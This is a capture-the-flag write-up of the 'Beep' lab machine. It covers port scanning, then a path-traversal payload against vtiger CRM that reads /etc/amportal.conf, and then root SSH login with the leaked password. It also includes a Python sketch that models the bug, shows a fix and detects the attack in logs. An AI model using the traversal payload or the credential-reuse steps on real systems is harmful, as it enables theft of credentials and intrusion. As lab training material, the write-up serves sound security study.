
Beep

Personal Rating: Easy

Enumeration

sudo nmap -sV -sC -p- <IP>

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: LOGIN-DELAY(0) USER UIDL PIPELINING STLS EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES TOP APOP AUTH-RESP-CODE
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            790/udp   status
|_  100024  1            793/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ANNOTATEMORE MULTIAPPEND RENAME Completed IMAP4rev1 CONDSTORE UIDPLUS ACL THREAD=ORDEREDSUBJECT X-NETSCAPE UNSELECT IMAP4 LISTEXT NAMESPACE URLAUTHA0001 STARTTLS THREAD=REFERENCES OK SORT CATENATE SORT=MODSEQ ATOMIC CHILDREN NO IDLE BINARY RIGHTS=kxte LIST-SUBSCRIBED ID QUOTA LITERAL+ MAILBOX-REFERRALS
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2023-12-08T12:48:17+00:00; +4s from scanner time.
793/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.570

Port 80/443:

The default creds of admin:palosanto did not work.

The SSL certificate only shows root@localhost.localdomain, nothing interesting there.

/var is listable and shows Apache/2.2.3 (CentOS).

Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh

I do not know how this one works; I found it with searchsploit.

The last one looks interesting, so I will try that. It exists in Metasploit as unix/http/freepbx_callmenumsear (this did not work).

Port 10000:

This shows a very simple login page.

feroxbuster -k -u https://10.10.10.7:10000/ -x cgi,sh,php,js,pl,rb

https://10.10.10.7:10000/session_login.cgi
https://10.10.10.7:10000/xmlrpc.cgi

The cgi component is very interesting. I might try shellshock/os command injection and search for more scripts.

Testing with metasploit, this does not seem to be vulnerable to Shellshock at first glance.

The page seems to be running Webmin, but I do not know the version.

Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)

Port 5038:

With a quick search on searchsploit and Exploit-DB I only found DoS attacks.

Port 4559:

Elastix LFI

This payload worked to get a config file (/etc/amportal.conf):

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

AMPDBUSER=asteriskuser
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
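As an added illustration (my code, not part of the original writeup or of Elastix/vtiger CRM): the bug shape behind that payload is a path built as fixed directory + user value + fixed suffix, where PHP before 5.3.4 stopped at a %00 null byte, so the suffix was lost and the traversal reached /etc/amportal.conf. The Python models that construction, an allow-list alternative, and a log-side check; the directory and the allow-list values are assumptions.

```python
import os
from urllib.parse import urlsplit, parse_qs

# Assumed layout (not taken from the box): the language file directory and the
# values an application would legitimately accept for current_language.
LANG_DIR = "/var/www/html/vtigercrm/include/language"
ALLOWED_LANGS = {"en_us", "de_de"}

def vulnerable_language_path(current_language: str) -> str:
    """Models the flawed pattern: raw parameter glued between a fixed directory
    and a fixed suffix. The pre-5.3.4 PHP behaviour is simulated: the C library
    call underneath stops at the first NUL, so the '.lang.php' suffix is lost."""
    path = f"{LANG_DIR}/{current_language}.lang.php"
    nul = path.find("\x00")
    if nul != -1:
        path = path[:nul]
    return os.path.normpath(path)          # '..' segments resolve here

def hardened_language_path(current_language: str):
    """Allow-list the value; no path is ever built from unvalidated input."""
    if current_language not in ALLOWED_LANGS:
        return None
    return f"{LANG_DIR}/{current_language}.lang.php"

def is_lfi_attempt(url: str) -> bool:
    """Defender-side check on a request URL (e.g. from an access log): flags an
    embedded NUL, a traversal sequence or an absolute path in the
    current_language parameter. parse_qs percent-decodes the value for us."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in params.get("current_language", []):
        if "\x00" in value or ".." in value or value.startswith("/"):
            return True
    return False

# The request from this writeup, used as the sample input.
PAYLOAD_URL = ("https://10.10.10.7/vtigercrm/graph.php?current_language="
               "../../../../../../../..//etc/amportal.conf%00&module=Accounts&action")

if __name__ == "__main__":
    lang = parse_qs(urlsplit(PAYLOAD_URL).query)["current_language"][0]
    print("vulnerable resolves to:", vulnerable_language_path(lang))  # /etc/amportal.conf
    print("hardened resolves to:", hardened_language_path(lang))      # None
    print("flagged as LFI attempt:", is_lfi_attempt(PAYLOAD_URL))     # True
```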

This worked to log in!

We now see some versions:

  • elastix 2.2.0
  • postfix 2.3.3
  • cyrus-imapd 2.3.7
  • asterisk 1.8.7.0
  • hylafax 4.3.10
  • freePBX 2.8.1

Asterisk has a CLI and a file editor. This certainly is interesting: we have some sort of secret here.

/dundi/secret : d0gMQ9A8XD+JSC4wEhclJQ==;8Ja1RzCJwA6g+tgYZ7j9Lw==

Root Access

I want to try ssh with the credentials we got:

https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0

https://stackoverflow.com/questions/69875520/git-error-no-matching-host-key-type-found-their-offer-ssh-rsa

This worked:

ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1 -o HostKeyAlgorithms=+ssh-rsa root@10.10.10.7

password: jEhdIekWmdjE

The key takeaway is to always try the simple things first. Check searchsploit for the simple exploits, try the ones that make sense, and if you have any credentials, try them over SSH with every username you know. Always work from simple to complex so you do not miss an easy win.

Links:

https://github.com/daniboomberger/elastix_lfi
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
https://github.com/squid22/Webmin_CVE-2019-15107